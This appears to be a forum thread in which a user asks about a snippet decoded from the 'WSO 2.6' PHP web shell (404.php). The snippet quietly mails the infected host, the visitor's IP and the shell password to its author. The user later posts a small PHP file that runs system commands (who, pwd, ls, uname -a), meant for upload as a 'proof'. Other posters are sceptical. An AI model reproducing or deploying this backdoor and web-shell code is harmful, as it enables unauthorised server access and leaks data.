What is this php?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • deonbell
    Confirmed User
    • Sep 2015
    • 1045

    #1

    What is this php?

    PHP Code:
    $visitc = $_COOKIE["visits"];
    if ($visitc == "") {
      $visitc  = 0;
      $visitor = $_SERVER["REMOTE_ADDR"];
      $web     = $_SERVER["HTTP_HOST"];
      $inj     = $_SERVER["REQUEST_URI"];
      $target  = rawurldecode($web.$inj);
      $judul   = "WSO 2.6 http://$target by $visitor";
      $body    = "Bug: $target by $visitor - $auth_pass";
      if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
    } 
    

    I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

    Here is all code.
    "404 Not Found" By aLLiGaToR - Pastebin.com
    Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

    I only use code for good. I want to be a white hacker.
  • Spunky
    I need a beer
    • Jun 2002
    • 133986

    #2
    It will never work

    Comment

    • deonbell
      Confirmed User
      • Sep 2015
      • 1045

      #3
      Originally posted by Spunky
      It will never work
      Yes, I try pentest monkey shell and it not work at all. I delete base64 code from 404.php shell. I hope no more backdoors. And it works on old server running old php 5.5, but not on server with php 7. Maybe 404 php code defecated in php 7.

      Thank for your help Spunky.

      Comment

      • Spunky
        I need a beer
        • Jun 2002
        • 133986

        #4
        I try to help the peoples

        Comment

        • clickity click
          So Fecking Bummed
          • Aug 2014
          • 3682

          #5
          Originally posted by deonbell
          PHP Code:
          $visitc = $_COOKIE["visits"];
          if ($visitc == "") {
            $visitc  = 0;
            $visitor = $_SERVER["REMOTE_ADDR"];
            $web     = $_SERVER["HTTP_HOST"];
            $inj     = $_SERVER["REQUEST_URI"];
            $target  = rawurldecode($web.$inj);
            $judul   = "WSO 2.6 http://$target by $visitor";
            $body    = "Bug: $target by $visitor - $auth_pass";
            if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
          } 
          

          I find program, I want to use application called 404.php. But I looked at code. It said base64 encoded in code and this what is said. Does e-mail password and ip?

          Here is all code.
          "404 Not Found" By aLLiGaToR - Pastebin.com
          Maybe I just delete base64 line in code. Everything okay? Or maybe better if I use pentest monkey's reverse shell.

          I only use code for good. I want to be a white hacker.
          What do you want to do with the shell?

          Comment

          • HomerSimpson
            Too lazy to set a custom title
            • Sep 2005
            • 13826

            #6
            When I try to open that pastebin my NOD32 says:
            Make a bank with Chaturbate - the best selling webcam program
            Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

            PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

            Comment

            • clickity click
              So Fecking Bummed
              • Aug 2014
              • 3682

              #7
              Originally posted by HomerSimpson
              When I try to open that pastebin my NOD32 says:
              Well duh. It's a web shell.

              Comment

              • CPA-Rush
                small trip to underworld
                • Mar 2012
                • 4927

                #8
                https://github.com/rogierkn/PrettyBoot

                automatic exchange - paxum , bitcoin,pm, payza

                . daizzzy signbucks caution will black-hat black-hat your traffic

                ignored forever :zuzana designs

                Comment

                • Barry-xlovecam
                  It's 42
                  • Jun 2010
                  • 18083

                  #9
                  Happy Hacking
                  k0d3k1dd13

                  Comment

                  • deonbell
                    Confirmed User
                    • Sep 2015
                    • 1045

                    #10
                    I think I don't need nice shell for proof of conception. I create a php file that shows I upload. I want to upload this to facebook or google and get money for finding bug. I will make similar files for asp and js. Then I get a money to buy new roller blades.

                    PHP Code:
                    <?php
                    
                    echo "<h1>proof</h1>";
                    echo "<h1>who?</h1>";
                    system("who");
                    echo "<h2>Current Directory</h2>";
                    system("pwd");
                    echo "<h2>Files</h2>";
                    system("ls");
                    echo "<h2>Uname</h2>";
                    system("uname -a");
                    
                    
                    ?>

                    Comment

                    • Colmike9
                      (>^_^)b
                      • Dec 2011
                      • 7230

                      #11
                      People doing code bounties don't have to ask questions like this..
                      Join the BEST cam affiliate program on the internet!
                      I've referred over $1.7mil in spending this past year, you should join in.
                      I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                      Comment

                      Working...